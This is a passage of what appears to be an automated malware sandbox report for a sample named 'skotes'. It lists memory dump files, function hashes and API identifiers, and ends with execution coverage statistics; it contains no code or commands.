                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310836503.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310851449.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310868842.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310884881.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310908123.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310925434.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310943679.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310963193.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310981224.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310998973.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311018419.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311037778.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311052250.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311068907.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311087153.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311110738.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311128832.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311148034.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311166818.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311184463.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311206565.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311221539.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311240106.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311306441.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311320909.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311337615.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311352481.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311374544.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311396158.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _strrchr
                                                                                                                                                                                                                                          • String ID: vl
                                                                                                                                                                                                                                          • API String ID: 3213747228-3645925279
                                                                                                                                                                                                                                          • Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                                                          • Instruction ID: bf3f50399607ca427c2d8a53b31435ac0948c388bf40e27d1b47b3f6881d54bd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7B103329046459FDB11CF68C841FFEBBA6EF4A360F1441AEE859DB341D6349D42CBA4
                                                                                                                                                                                                                                          Function 00692EC0 Relevance: 7.8, APIs: 5, Instructions: 272COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310362606.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310380497.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310440680.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310459821.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310480195.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310578878.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310597404.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310616397.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310632940.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310649956.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310649956.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310689049.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310708966.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310726399.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310744767.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310761898.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310779161.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310802669.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310817843.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310836503.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310851449.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310868842.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310884881.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310908123.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310925434.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310943679.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310963193.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310981224.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310998973.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311018419.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311037778.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311052250.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311068907.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311087153.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311110738.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311128832.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311148034.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311166818.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311184463.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311206565.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311221539.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311240106.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311306441.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311320909.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311337615.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311352481.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311374544.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311396158.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Mtx_unlock$Cnd_broadcast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 32384418-0
                                                                                                                                                                                                                                          • Opcode ID: b7b2c6e37a96bd0240c05db2bcfca8eefea8c625ce7caefea533d67e53b7c4ce
                                                                                                                                                                                                                                          • Instruction ID: 04cc64f415b25e3605ee5b3d0642d13ddd00c4c9d9f808a0d1e98e8bcc12db80
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7b2c6e37a96bd0240c05db2bcfca8eefea8c625ce7caefea533d67e53b7c4ce
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DEA1C170A01615AFDF21EF64C944BAAB7FAFF16324F048129E815D7B51EB31EA04CB91
                                                                                                                                                                                                                                          Function 006ABB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310362606.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310380497.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310440680.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310459821.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310480195.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310578878.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310597404.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310616397.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310632940.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310649956.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310649956.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310689049.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310708966.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310726399.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310744767.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310761898.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310779161.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310802669.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310817843.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310836503.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310851449.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310868842.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310884881.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310908123.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310925434.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310943679.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310963193.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310981224.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310998973.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311018419.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311037778.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311052250.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311068907.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311087153.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311110738.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311128832.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311148034.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311166818.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311184463.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311206565.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311221539.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311240106.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311306441.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311320909.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311337615.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311352481.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311374544.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311396158.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 531285432-0
                                                                                                                                                                                                                                          • Opcode ID: 89cd37c8eec8293584f6b4ab9ccb8e18fb23059ae53279cd9d9df9d29aa15464
                                                                                                                                                                                                                                          • Instruction ID: e33c62303ab160b84f54c5b304842113a3dc52c00c529879a39efe8211a090de
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 89cd37c8eec8293584f6b4ab9ccb8e18fb23059ae53279cd9d9df9d29aa15464
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5211D71A00219AFDF00FBA4DC819BEB7BAEF0A720F101059F501AB251DB709D419FA4
                                                                                                                                                                                                                                          Function 006CF35F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310362606.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310380497.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310440680.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310459821.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310480195.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310578878.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310597404.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310616397.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310632940.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310649956.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310649956.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310689049.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310708966.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310726399.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310744767.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310761898.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310779161.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310802669.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310817843.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310836503.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310851449.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310868842.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310884881.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310908123.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310925434.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310943679.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310963193.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310981224.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310998973.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311018419.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311037778.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311052250.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311068907.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311087153.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311110738.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311128832.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311148034.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311166818.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311184463.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311206565.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311221539.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311240106.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311306441.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311320909.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311337615.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311352481.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311374544.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311396158.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ___free_lconv_mon
                                                                                                                                                                                                                                          • String ID: 8"o$`'o
                                                                                                                                                                                                                                          • API String ID: 3903695350-933842191
                                                                                                                                                                                                                                          • Opcode ID: 3a00a4d5ae036bc36d74e045e7195c9025937f03ed064251ff6aa66248beff31
                                                                                                                                                                                                                                          • Instruction ID: ef9ce2d450f9a4a8f505e0dfcd7f827ee58bde4eb0c6686d3ce86bd250f26e2a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a00a4d5ae036bc36d74e045e7195c9025937f03ed064251ff6aa66248beff31
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF316931600205EFEB24AB79D845FBB77EBEF00316F10842EE04AD7692DE30AC808B55

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:7.4%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                          Signature Coverage:4.4%
                                                                                                                                                                                                                                          Total number of Nodes:836
                                                                                                                                                                                                                                          Total number of Limit Nodes:74
